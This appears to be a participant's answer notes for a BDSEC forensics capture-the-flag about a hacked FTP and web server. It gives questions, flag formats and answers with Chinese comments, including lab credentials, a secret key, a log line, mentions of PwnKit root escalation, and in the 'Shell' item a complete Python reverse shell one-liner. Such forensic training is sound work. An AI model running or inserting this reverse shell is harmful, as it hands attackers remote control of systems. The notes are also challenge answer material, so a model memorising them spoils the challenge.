Flag Format : BDSEC{username_password}
BDSEC{ftpadmin_ftpadmin}
----Uploaded File
50
What file did the attacker uploaded to the ftp server? [with location]
上传的文件
Flag Format : BDSEC{/location/file_name}
BDSEC{/files/.hacker.note}
----Log File
50
What is the log file name? 日志文件叫啥
Flag Format : BDSEC{something.log}
BDSEC{vsftpd.log}
----Project Incharge
50
Who was the incharge of the website project? 负责人,这个通过看3个邮件email1,2,3
Flag Format : BDSEC{name}
BDSEC{Mark}
----Loooong Loooog
50
Can you ananlyze the log file & split out the date time of first successful login?
Flag Format : BDSEC{day_month_date_ti:m:e} Example Flag : BDSEC{Sun_May_16_15:38:13}
###nM...log Thu Jul 14 10:16:59 2022 [pid 8631] [ftpadmin] OK LOGIN: Client "::ffff:192.168.1.10"
BDSEC{Thu_Jul_14_10:16:59} 首次登录成功时间,在日志文件里
----Administrator
50
What is the admin panel username & password?
Flag Format : BDSEC{username_password}
BDSEC{demo_demo}
----Shell
50
What reverse shell payload did the attacker used to gain a reverse shell? 提供反向shell用的payload
Flag Format : BDSEC{payload in plain text}
BDSEC{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.10",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'} #这个怎么也常觉得不会这么长,还真是这么长
----Secret Key
50
What is the secret key? 密钥,这个在数据库表里
Flag Format : BDSEC{secretKey}
BDSEC{2jo3t12nv51w1pw4wk1kj58s1jb6w0}
----Database Admin
50
What is the database username & password? 数据库用用户密码
Flag Format : BDSEC{username_password}
BDSEC{root_root}
----HostName
50
What is the hostname of the server? 主机名(把括号去年,空格换下划线)
Flag Format : BDSEC{hostname}
BDSEC{Ubuntu}
----CodeName
50
What is the codename the server? 在主机信息里的CODENAME
Flag Format : BDSEC{Codname}
BDSEC{xenial}
----Server Info
50
What server & version the server is using? (main os)
Flag Format : BDSEC{servername_version_something_something}
Example Flag : BDSEC{CentOS_2022.2_LTS_GNU_Linux}主机名(把括号去年,空格换下划线)
BDSEC{Ubuntu_16.04.1_LTS_Xenial_Xerus}
----Service Exploit
50
Which service package did the attacker used to gain root access of the server?
Flag Format : BDSEC{package_name} 攻击都用root访问的包名
BDSEC{} ?
----Exploit Exploit Exploit
50
Which exploit did the attacker used to gain root access of the server?
Flag Format : BDSEC{exploit_name}
BDSEC{} ?
----Vulnerable Service
50
Which utility is vulnerable to pwnkit? 哪个应用容易受到pwnkit的攻击
Flag Format : BDSEC{utility_name}
BDSEC{} ???
----msg.txt
50
What is the content of msg.txt?
Flag Format : BDSEC{content_of_the_msg_file}
BDSEC{The_Server_Is_Now_under_My_Control_:D_:D} msg文件是在nc后手工输入的
----Attacker
50
What is the attacker name?
Flag Format : BDSEC{attacker}
BDSEC{} ?
----Server User's
50
How many user's home directory were listed in the server? 数下目录下的用户名
Flag Format : BDSEC{0}
BDSEC{8}